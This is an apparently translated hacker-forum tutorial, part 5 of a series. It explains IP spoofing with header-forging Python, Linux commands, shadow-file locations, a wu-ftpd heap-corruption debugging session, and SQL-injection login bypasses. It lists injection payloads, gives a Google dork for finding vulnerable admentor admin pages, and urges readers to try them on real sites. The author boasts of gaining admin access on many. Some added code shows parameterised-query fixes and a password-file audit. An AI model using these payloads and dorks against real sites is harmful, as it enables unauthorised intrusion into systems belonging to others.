The most basic insights to becoming a Hacker - Part 5


31. What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol / Internet Protocol. A TCP/IP packet is a block of data with a header attached in front of it; the sending host builds the packet and hands it to the network, which delivers it to another computer. This is how the internet carries traffic: everything is sent as packets. The IP header contains, among other fields, the IP address of the sender (source address) and of the receiver (destination address).

Nothing in IP verifies the source address, so a packet can be rewritten so that it appears to come from someone else (IP spoofing). This is one way to reach systems without leaving your own address in their logs, but keep two things in mind: the replies go to the address you forged, not to you, and TCP's three-way handshake means a forged address alone does not give you a session. Spoofing is mainly useful for one-way traffic, for UDP services and for flooding attacks. To build packets by hand you need a Linux or Unix machine with root privileges (raw sockets) or a program that does it for you.
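As an added example (not code from the original article), here is the IPv4 header built and parsed in Python, with the source-address rewrite the text describes. The addresses are constructed documentation addresses and the script only builds bytes in memory; it does not send anything, which would need raw sockets and root:

```python
import socket
import struct

# Added example (not code from the original article): build and parse a
# minimal IPv4 header so the fields the text talks about are visible byte by
# byte, and rewrite the source address the way a spoofing tool does.
# Addresses used below are constructed documentation addresses (RFC 5737).

def ip_checksum(data: bytes) -> int:
    """RFC 791 header checksum: one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

# ver/ihl, tos, total length, id, flags/frag, ttl, proto, checksum, src, dst
IPV4_FMT = "!BBHHHBBH4s4s"

def build_ipv4_header(src: str, dst: str, payload_len: int,
                      proto: int = 6, ttl: int = 64, ident: int = 0) -> bytes:
    """20-byte IPv4 header with no options; proto 6 = TCP."""
    ver_ihl = (4 << 4) | 5                   # version 4, header length 5 words
    hdr = struct.pack(IPV4_FMT, ver_ihl, 0, 20 + payload_len, ident, 0,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]

def parse_ipv4_header(pkt: bytes) -> dict:
    """Decode the first 20 bytes; checksum_ok is True when the sum over the header is 0."""
    f = struct.unpack(IPV4_FMT, pkt[:20])
    return {
        "version": f[0] >> 4, "ihl": f[0] & 0xF, "total_len": f[2], "id": f[3],
        "ttl": f[5], "proto": f[6], "checksum": f[7],
        "src": socket.inet_ntoa(f[8]), "dst": socket.inet_ntoa(f[9]),
        "checksum_ok": ip_checksum(pkt[:20]) == 0,
    }

def set_source(pkt: bytes, new_src: str, fix_checksum: bool = True) -> bytes:
    """Rewrite the source address (IP spoofing). Nothing in the header
    authenticates it, but a receiver drops the packet if the checksum is not
    recomputed, so a real spoofing tool always does both steps."""
    out = pkt[:12] + socket.inet_aton(new_src) + pkt[16:]
    if fix_checksum:
        zeroed = out[:10] + b"\x00\x00" + out[12:20]
        out = out[:10] + struct.pack("!H", ip_checksum(zeroed)) + out[12:]
    return out

if __name__ == "__main__":
    pkt = build_ipv4_header("192.0.2.10", "192.0.2.1", payload_len=8)
    print(parse_ipv4_header(pkt))
    # forged source without fixing the checksum: a router or host discards it
    print(parse_ipv4_header(set_source(pkt, "203.0.113.5", fix_checksum=False)))
    # forged source with the checksum recomputed: accepted, replies go to 203.0.113.5
    print(parse_ipv4_header(set_source(pkt, "203.0.113.5")))
```

The checksum covers only the header, so forging the source costs one recomputation; that is why spoofing is trivial at the IP layer and why anything that matters must be authenticated above it.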

32. What is Linux?

In the original sense, Linux is the kernel of the operating system. The kernel is the software responsible for communication between application programs and the hardware: it provides file management, virtual memory management, and drivers for input/output devices such as the hard disk, monitor and keyboard. The Linux kernel by itself is not a complete operating system; it has to be combined with the user-space programs written by the GNU project to form one: the Linux operating system. This is why you see "GNU/Linux" when people refer to Linux.

Next, a company or organisation packages these products (the kernel and the application programs), adjusts some of the configuration to give the package the identity of that company or organisation, and adds an installation process. Such a packaged Linux set is called a distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in the kernel version. Some of today's major Linux distributions are Debian, Red Hat, Mandrake, Slackware and SuSE.

33. Basic commands to know when using or getting into Linux systems:

  1. "man" command: when you want to know how to use a command, read its manual page:
    1. Command structure: $ man <command>
    2. For example: $ man man
  2. "uname" command: tells us basic information about the system.
    1. For example: $ uname -a; it prints something like: Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown
  3. "id" command: show the current uid/gid (the current user name and groups).
  4. "w" command: show the logged-in users and what they are running on the system.
    1. For example: $ w prints a header like: 10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00, followed by one line per logged-in user.
  5. "ps" command: show the processes on the system.
    1. For example: $ ps axuw (all processes, with owner and full command lines)
  6. "cd" command: change to another directory.
    1. For example: $ cd /usr/bin ----> takes you to the /usr/bin directory
  7. "mkdir" command: create a directory.
    1. For example: $ mkdir /home/convit ---> creates the directory convit in /home
  8. "rmdir" command: remove an (empty) directory.
    1. For example: $ rmdir /home/conga ----> removes the directory conga from /home.
  9. "ls" command: list directory contents.
    1. For example: $ ls -laR / (everything on the system, recursively, with details)
  10. "printf" command: prints formatted data, like the C printf() function. The shell's printf interprets backslash escapes in the format string, which is handy for producing raw bytes (for example shellcode) as input to a program.
    1. Example: $ printf '\x41\x41\x41\x41' ----> prints AAAA
  11. "pwd" command: print the current directory.
    1. For example: $ pwd ------> tells us where we are: /home/level1
  12. The commands cp, mv, rm: copy, move, delete files.
    1. Example with rm (delete): $ rm -rf /var/tmp/blah -----> deletes blah (and, if it is a directory, everything inside it, without asking).
  13. cp and mv are used the same way: $ cp source destination, $ mv source destination.
  14. "find" command: search for files and directories.
    1. For example: $ find / -user level2 ----> every file on the system owned by user level2
  15. "grep" command: search text for a pattern; the simplest form is grep "something".
    1. For example: $ ps axuw | grep "level1" ----> only the process lines that mention level1
  16. "strings" command: print the printable character sequences found in a file. Use it to find string constants in a program, the system and library functions it calls, and sometimes hard-coded passwords.
    1. For example: $ strings /usr/bin/level1
  17. "strace" command (Linux): trace system calls and signals. Extremely useful for following a program's flow and the fastest way to find out where a program fails. On other Unix systems the equivalent tools are truss and ktrace.
    1. For example: $ strace /usr/bin/level1
  18. "cat" and "more" commands: print a file's contents to the screen.
    1. $ cat /etc/passwd | more -> dumps the passwd file and pages it one screen at a time (cat alone prints the whole file at once).
    2. $ more /etc/passwd ----> shows the passwd file one screen at a time.
  19. "hexdump" command: print the input as hex, octal, decimal or ASCII values.
    1. For example: $ echo AAAA | hexdump (use hexdump -C to see hex and ASCII side by side)
  20. The commands cc, gcc, make, gdb: compilation and debugging tools.
    1. For example: $ gcc -g -o bof bof.c (-g keeps debugging symbols for gdb; -o names the output file)
    2. For example: $ make bof
    3. For example: $ gdb level1
    4. (gdb) break main
    5. (gdb) run
  21. "perl" command: a scripting language, handy for generating input.
    1. For example: $ perl -e 'print "A" x 1024' | ./bufferoverflow ----> feeds 1024 'A' characters to the program; if it copies its input into a fixed-size buffer without checking the length, it crashes (a buffer overflow).
  22. "bash" command: it is time to automate your tasks with shell scripts, very powerful and flexible. To learn about bash: $ man bash
  23. "ls" command again, with its common options (list the files in a directory):
    1. For example: $ ls /home ----> shows all files in the /home directory
    2. $ ls -a -----> shows all files, including hidden (dot) files
    3. $ ls -l -----> gives details (permissions, owner, size, date) about the files
  24. Redirecting output to a file:
    1. For example: $ ls /usr/bin > ~/convoi ------> writes the listing of /usr/bin to the file convoi in your home directory.

34. Basic insights around Linux:

a. Some important directories on the server:

  1. /home: where user files are stored (e.g. if the user who logs in is named convit, there will be a directory /home/convit)
  2. /bin: where essential Unix commands such as ls live.
  3. /usr/bin: where the other commands live, including those used by particular users and by the system administrator.
  4. /boot: where the kernel and the other files used at boot time are kept.
  5. /etc: system configuration: network settings, the NFS (Network File System) export files, and the passwd/shadow files (this is the directory an attacker is most interested in)
  6. /var: variable data: logs, mail and print spools, administrative files
  7. /usr/lib: standard libraries such as libc.a
  8. /usr/src: where program source code is kept.

b. Where the password hashes are kept on various Unix versions (the third column is the token left in the password field of /etc/passwd when the hashes have been moved to the shadow file):

CODE
System                 Shadow file                      Token in /etc/passwd
AIX 3                  /etc/security/passwd             !
                       or /tcb/auth/files//
A/UX 3.0s              /tcb/files/auth/?/*
BSD4.3-Reno            /etc/master.passwd               *
ConvexOS 10            /etc/shadpw                      *
ConvexOS 11            /etc/shadow                      *
DG/UX                  /etc/tcb/aa/user/                *
EP/IX                  /etc/shadow                      x
HP-UX                  /.secure/etc/passwd              *
IRIX 5                 /etc/shadow                      x
Linux 1.1              /etc/shadow                      *
OSF/1                  /etc/passwd[.dir|.pag]           *
SCO Unix #.2.x         /tcb/auth/files//
SunOS4.1+c2            /etc/security/passwd.adjunct     ##username
SunOS 5.0              /etc/shadow
System V Release 4.0   /etc/shadow                      x
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]             *
UNICOS                 /etc/udb                         *
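An added example, not from the original article: a small Python parser and audit for records in the /etc/passwd format, reporting what matters once you have read the file: whether the password field holds a real hash or only one of the tokens from the table above, empty password fields, and extra UID-0 accounts. The SAMPLE records are constructed and the hash in them is made up:

```python
import re

# Added example, not part of the original article: parse /etc/passwd-style
# records and report what an attacker (or an auditor) looks for: whether the
# password field holds a real hash or only a token pointing at a shadow file,
# empty password fields, and accounts other than root with UID 0.
# SAMPLE is constructed test data; the hash value is made up.

SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
level1:x:1001:1001:Level 1:/home/level1:/bin/bash
convit:$1$saltsalt$Qm3ZBMiE9YSR1Dti7TQkG1:1002:1002::/home/convit:/bin/bash
guest::1003:1003:Guest:/home/guest:/bin/bash
toor:*:0:0:backdoor:/:/bin/sh
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text):
    """Split passwd lines into dicts; uid/gid become ints. Malformed lines raise."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(parts)))
        rec = dict(zip(FIELDS, parts))
        rec["uid"], rec["gid"] = int(rec["uid"]), int(rec["gid"])
        records.append(rec)
    return records

def classify_password(pw):
    """Say what the password field contains."""
    if pw == "":
        return "empty"                      # no password needed to log in
    if pw in ("x", "*") or pw.startswith("!"):
        return "shadowed_or_locked"         # hash lives elsewhere, or account locked
    if pw.startswith("$"):
        return "hash"                       # modular crypt format ($1$, $5$, $6$, ...)
    if re.fullmatch(r"[./0-9A-Za-z]{13}", pw):
        return "hash"                       # traditional 13-character DES crypt
    return "unknown"

def audit_passwd(text):
    """Return (account, finding) pairs worth a closer look."""
    findings = []
    for rec in parse_passwd(text):
        kind = classify_password(rec["pw"])
        if kind == "empty":
            findings.append((rec["name"], "empty password field"))
        elif kind == "hash":
            findings.append((rec["name"], "hash stored in world-readable passwd"))
        if rec["uid"] == 0 and rec["name"] != "root":
            findings.append((rec["name"], "extra UID 0 account"))
    return findings

if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE):
        print("%-8s %s" % (account, finding))
```

A hash that still sits in /etc/passwd can be copied by any local user and cracked offline; a token means you need the shadow file (root, or a bug that reads it for you) before any cracking can start.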

35. Exploiting Linux through a security hole in the WU-FTP server:

WU-FTP Server (WU-FTPD, developed at Washington University) is FTP server software used very widely on Unix and Linux systems (all the distributions: Redhat, Caldera, Slackware, Suse, Mandrake, ...) and on Windows. Because of a bug in the server's file-name globbing code (the code that expands patterns such as ~, { }, [ ] in path arguments), a user can corrupt the server's heap and run commands of their choice remotely, with the privileges of the FTP daemon.

However, exploiting this bug is not easy, because the following conditions must be met:

+ You must have an account on the server (an anonymous account is enough, as the session below shows).
+ You must get shellcode into the memory of the server process (for example in the password or in a command argument, which the server keeps in memory).
+ You must send an FTP command containing a specially crafted glob pattern, so that the server mishandles it without reporting an error.
+ The corrupted heap memory must end up overwriting a function pointer or return address with the address of the shellcode, so that the FTP server itself executes it.

Let's analyse the following example session against an FTP server (the first part is the ftp client; the second terminal, tty3, runs ps and gdb against the server):

CODE
ftp> open localhost <== connect to the FTP server on this machine.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== the banner gives away the server software and its version.
Name (localhost:root): anonymous <== log in as the anonymous user
331 Guest login ok, send your complete e-mail address as password.
Password: ......... <== the "password" is a long run of 'a' characters (visible in the ps output below); the server keeps it in memory
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{ <== a directory listing with a malformed glob pattern: this is the trigger.
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection <== the server process has died.

(second terminal, tty3: find the child ftpd that serves our session and attach gdb to it before sending the ls)
$ ps ax | grep ftpd
1405 ?     S 0:00 ftpd: accepting connections on port 21 <== the parent listener on port 21.
7611 tty3  S 1:29 gdb /usr/sbin/wu.ftpd
26256 ?    S 0:00 ftpd: sasha: anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <== our session; the process title shows the password we sent.
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) attach 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== now the debugger watches the wu.ftpd child that handles our session.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6 <== the server is blocked in read(), waiting for our next command.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c <== free() was called on the pointer 0x61616161, i.e. the bytes "aaaa" from our password: data we supplied has overwritten a heap pointer.

So far I have not managed to exploit this bug successfully (I do not know where it goes wrong). If you can do it, post it so that I know.

Linux bugs at the moment are very few (especially for Redhat); wait for a new one and the 'Security hole' section will be updated at once. For how to exploit them, ask the moderators of that section, especially Leonhart, who answers questions diligently.

(Based on the article by Binhnx2000)
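An added example, not part of the original article or of Binhnx2000's session: the crash above ended in free(0x61616161), and 0x61616161 is just the bytes "aaaa" from the password, so some part of our input overwrote a heap pointer. A run of identical bytes cannot say which part; a cyclic pattern, in which every 4-byte window is unique, can. The Python below generates such a pattern, maps a value reported by gdb back to an offset in the input, and pulls the value out of a gdb frame line. The pattern alphabet and the 0x41316141 value in the usage are assumptions for illustration, not anything seen in the original session:

```python
import re
import struct

# Added example, not part of the original article or of the gdb session it
# quotes. The session filled the anonymous password with 'a' bytes and the
# server died in free(0x61616161): the bytes "aaaa" had overwritten a heap
# pointer. With identical bytes you cannot tell which part of the input got
# there. A cyclic pattern (every 4-byte window unique) answers that: the value
# gdb reports at the crash maps back to one offset in the input. This is the
# general technique; the values used below are assumptions for illustration.

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before it repeats

def pattern_create(length):
    """Aa0Aa1Aa2...: triples of (upper, lower, digit); every 4-byte window is unique."""
    if length > MAX_LEN:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_LEN)
    chunks = []
    for up in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                chunks.append(up + lo + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def value_bytes(value, little_endian=True):
    """The bytes behind a 32-bit value as gdb prints it (x86 is little-endian)."""
    return struct.pack("<I" if little_endian else ">I", value)

def pattern_offset(value, length, little_endian=True):
    """Offset in pattern_create(length) where the crash value's bytes sit, or -1."""
    needle = value if isinstance(value, bytes) else value_bytes(value, little_endian)
    return pattern_create(length).encode().find(needle)

GDB_VALUE = re.compile(r"=\s*0x([0-9a-fA-F]+)")

def crash_value_from_gdb(line):
    """Pull the hex argument out of a gdb frame line such as
    '__libc_free (mem=0x61616161) at malloc.c:3136'."""
    m = GDB_VALUE.search(line)
    if not m:
        raise ValueError("no hex value in: " + line)
    return int(m.group(1), 16)

if __name__ == "__main__":
    v = crash_value_from_gdb("__libc_free (mem=0x61616161) at malloc.c:3136")
    print(hex(v), value_bytes(v))          # 0x61616161 b'aaaa': the password bytes
    # Had the password been pattern_create(1024) instead of 'aaaa...', a crash
    # value of 0x41316141 ("Aa1A") would mean offset 3 of the input.
    print(pattern_offset(0x41316141, 1024))
```

Knowing the offset tells you which bytes of the input to replace with the pointer you want free() (or whatever consumes the corrupted value) to see; without it you are guessing, which is usually where "I do not know where it goes wrong" comes from.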

36. Learn about SQL Injection:

SQL Injection is one of the most popular types of web hacking. By injecting SQL code into an input field before the web application passes it to the database, you can log in without a username and password, execute commands on the database server, retrieve data, and sometimes take over the SQL server itself. The attack tool is any web browser: Internet Explorer, Netscape, Lynx, ...

You can find a vulnerable web site by using search engines to look for pages that accept submitted data (login forms, search boxes). Some pages pass their parameters through hidden form fields, so you have to view the page source to see them: look at the form and its input fields in the source to find out which parameters the page submits.


Check whether the web page has this bug by entering the following as login and password:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--

If that does not work, try the following as login and password:

CODE

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

If one of them succeeds, you are logged in without knowing a username or password. The quote closes the string literal the application built around your input, "or 1=1" makes the WHERE condition true for every row, and "--" comments out the rest of the query.

This bug lives in the query the application builds, so if you have ever worked with a database you can exploit it easily just by typing query fragments into your browser. If you want to learn more about it, look for the vicky group's articles.

37. An example of web hacking through the admentor bug (a type of SQL injection bug):

First go to google.com and search for web sites running admentor with the keyword 'allinurl:admentor'.

Usually you will get results like:

http://www.someserver.com/admentor/admin/admin.asp

Try entering "' or ''='" as both login and password:

CODE

Login: ' or ''='

Password: ' or ''='

If successful, you are in the site as admin.

Let's look at how to fix this bug:

+ Filter the special characters (the single quote, double quote and the other characters matched below) out of the input with a JavaScript function like the following:

CODE
function RemoveBad(strTemp)
{
    // strip < > " ' % ; ( ) & + - from the input before it reaches the query
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}

And call it from the ASP script (on the server) for every request parameter before it goes into the query:

CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));

This stops the payloads above, but it is only a stop-gap: stripping characters breaks legitimate input (a password that contains a quote) and does not cover injections that need none of the listed characters, for example a numeric parameter fed "1 or 1=1". The proper fix is to never build the query from strings: use parameterised queries (prepared statements), so that user input reaches the database as data and not as SQL text. The filter must also run on the server; a check done only in the browser is bypassed simply by sending the request by hand.
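An added example, not the article's own code: the login check written both ways in Python against an in-memory SQLite database with constructed users, plus a port of RemoveBad(), so you can see that the payloads above succeed against the concatenated query, fail against the parameterised one, and that the character filter stops them for a quoted string but not for an unquoted numeric parameter. Table, users and passwords are constructed:

```python
import re
import sqlite3

# Added example, not the article's own code. The same login check written the
# vulnerable way (query text built from the input, which the payloads above
# defeat) and the safe way (parameterised query), plus a port of the RemoveBad
# filter to show what it does and does not stop. Runs against an in-memory
# SQLite database with constructed users; no network, no real site.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "convit", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """Input pasted into the SQL text: a quote ends the string literal and the
    rest of the input is parsed as SQL. Returns the matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterised(conn, username, password):
    """Input bound as data: the database never parses it as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def remove_bad(s):
    """Python port of the article's RemoveBad(): strips < > " ' % ; ( ) & + -"""
    return re.sub(r"[<>\"'%;()&+\-]", "", s)

def profile_vulnerable(conn, user_id):
    """Numeric parameter with no quotes around it: none of the characters the
    filter removes are needed to inject here."""
    sql = "SELECT username FROM users WHERE id = " + user_id + " ORDER BY id"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def profile_safe(conn, user_id):
    """Validate the type first, then bind the value."""
    try:
        uid = int(user_id)
    except ValueError:
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1--", "x"))                    # admin: no password needed
    print(login_vulnerable(db, "' or ''='", "' or ''='"))             # admin: the admentor payload
    print(login_parameterised(db, "' or 1=1--", "x"))                 # None
    print(login_vulnerable(db, remove_bad("' or 1=1--"), remove_bad("x")))  # None: filter works here
    print(profile_vulnerable(db, remove_bad("2 or 1=1")))             # admin: filter does not help
    print(profile_safe(db, "2 or 1=1"))                                # None
```

The first payload turns the WHERE clause into `username = '' or 1=1` with the password check commented out; the parameterised version compares the literal string "' or 1=1--" against the username column and finds nothing.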

You can apply this trick to other web sites that accept submitted data; try it and see. Very many Vietnamese web sites have it; I have obtained admin access on quite a few by trying this (but I also told them to fix it).

On many pages you cannot log in with ' or ''=' but only with a real nickname registered on that web site; go to the 'member' link, get hold of an admin's account and test with that.

Happy hacking.

In Part 6 I will cover the denial-of-service attack (DoS attack), a powerful attack that once knocked our mighty HVA web site offline for a short while when the admin was away drinking coffee and nobody was watching. Along with it come the DoS attack methods that have been used.

GOOD LUCK!!!!!!!!!!!!!!!!!!!!

(Part 5) - Author: Anhdenday
